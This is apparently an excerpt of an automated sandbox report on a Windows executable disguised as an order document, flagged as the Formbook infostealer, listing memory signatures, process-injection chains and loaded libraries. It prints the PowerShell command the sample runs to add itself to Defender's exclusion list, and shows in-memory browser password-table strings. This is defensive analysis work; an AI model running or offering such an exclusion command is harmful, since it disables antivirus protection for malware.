            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035BF17210_2_035BF172
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035DB1B010_2_035DB1B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036870E910_2_036870E9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368F0E010_2_0368F0E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D70C010_2_035D70C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367F0CC10_2_0367F0CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368F7B010_2_0368F7B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_036816CC10_2_036816CC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368757110_2_03687571
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366D5B010_2_0366D5B0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035C146010_2_035C1460
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368F43F10_2_0368F43F
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FB7610_2_0368FB76
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03645BF010_2_03645BF0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0360DBF910_2_0360DBF9
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EFB8010_2_035EFB80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03643A6C10_2_03643A6C
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FA4910_2_0368FA49
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03687A4610_2_03687A46
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0367DAC610_2_0367DAC6
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03615AA010_2_03615AA0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03671AA310_2_03671AA3
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366DAAC10_2_0366DAAC
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D995010_2_035D9950
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EB95010_2_035EB950
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0366591010_2_03665910
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0363D80010_2_0363D800
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D38E010_2_035D38E0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FF0910_2_0368FF09
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D1F9210_2_035D1F92
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FFB110_2_0368FFB1
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D9EB010_2_035D9EB0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03687D7310_2_03687D73
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035D3D4010_2_035D3D40
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03681D5A10_2_03681D5A
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_035EFDC010_2_035EFDC0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_03649C3210_2_03649C32
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_0368FCF210_2_0368FCF2
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E21C8010_2_02E21C80
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E3A71010_2_02E3A710
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1CE6710_2_02E1CE67
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1CE7010_2_02E1CE70
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1B2EB10_2_02E1B2EB
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1D09010_2_02E1D090
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E1B11010_2_02E1B110
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E237C010_2_02E237C0
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_02E237BE10_2_02E237BE
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EA27510_2_034EA275
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EB01810_2_034EB018
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EBAF410_2_034EBAF4
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EBFAD10_2_034EBFAD
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EBD7B10_2_034EBD7B
            Source: C:\Windows\SysWOW64\compact.exeCode function: 10_2_034EBC1510_2_034EBC15
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 03617E54 appears 102 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 035BB970 appears 278 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0364F290 appears 105 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 03605130 appears 58 times
            Source: C:\Windows\SysWOW64\compact.exeCode function: String function: 0363EA12 appears 86 times
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: String function: 01407E54 appears 102 times
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: String function: 013F5130 appears 58 times
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: String function: 0142EA12 appears 86 times
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: String function: 0143F290 appears 105 times
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeCode function: String function: 013AB970 appears 280 times
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2118662660.0000000000A9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2134444569.000000000CF90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2132983409.00000000077E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2120287530.0000000002791000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2133206549.000000000780A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000000.00000002.2133206549.000000000780A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2507000951.00000000014AD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMPACT.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe, 00000005.00000002.2506815789.0000000000E58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMPACT.EXEj% vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeBinary or memory string: OriginalFilenameCAhp.exe> vs Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 5.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2506231029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4564032756.0000000002E10000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4565204551.00000000030A0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2506704352.0000000000E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000A.00000002.4571364654.00000000032E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4576370278.0000000004DC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000009.00000002.4571646187.0000000003D30000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000005.00000002.2507910619.0000000002B80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, DJO8vVomSf1ydRl3pV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, DJO8vVomSf1ydRl3pV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.454da20.2.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.cf90000.7.raw.unpack, bot8SiAUO3JBgG2e18.csSecurity API names: _0020.AddAccessRule
            Source: 0.2.Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.448ca00.3.raw.unpack, DJO8vVomSf1ydRl3pV.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@10/7@15/13
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe.logJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6332:120:WilError_03
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lxqwflws.i4u.ps1Jump to behavior
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: compact.exe, 0000000A.00000002.4565290385.0000000003192000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4565290385.000000000316E000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2684033486.0000000003163000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000002.4565290385.0000000003163000.00000004.00000020.00020000.00000000.sdmp, compact.exe, 0000000A.00000003.2683868623.0000000003143000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeReversingLabs: Detection: 23%
            Source: unknownProcess created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"
            Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeProcess created: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe "C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exe"Jump to behavior
            Source: C:\Program Files (x86)\odwsgngViRYKyJqZXdTIjyeOqeeFpWdVedwgxEUjBOUgmNVeyCCwHnPIhqdBxblppHmpjV\EUSOiCcoIEEJJ.exeProcess created: C:\Windows\SysWOW64\compact.exe "C:\Windows\SysWOW64\compact.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\compact.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: dwrite.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: windowscodecs.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\Art_Spec. 4008670601 AZTEK Order _ 7.3.2024.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
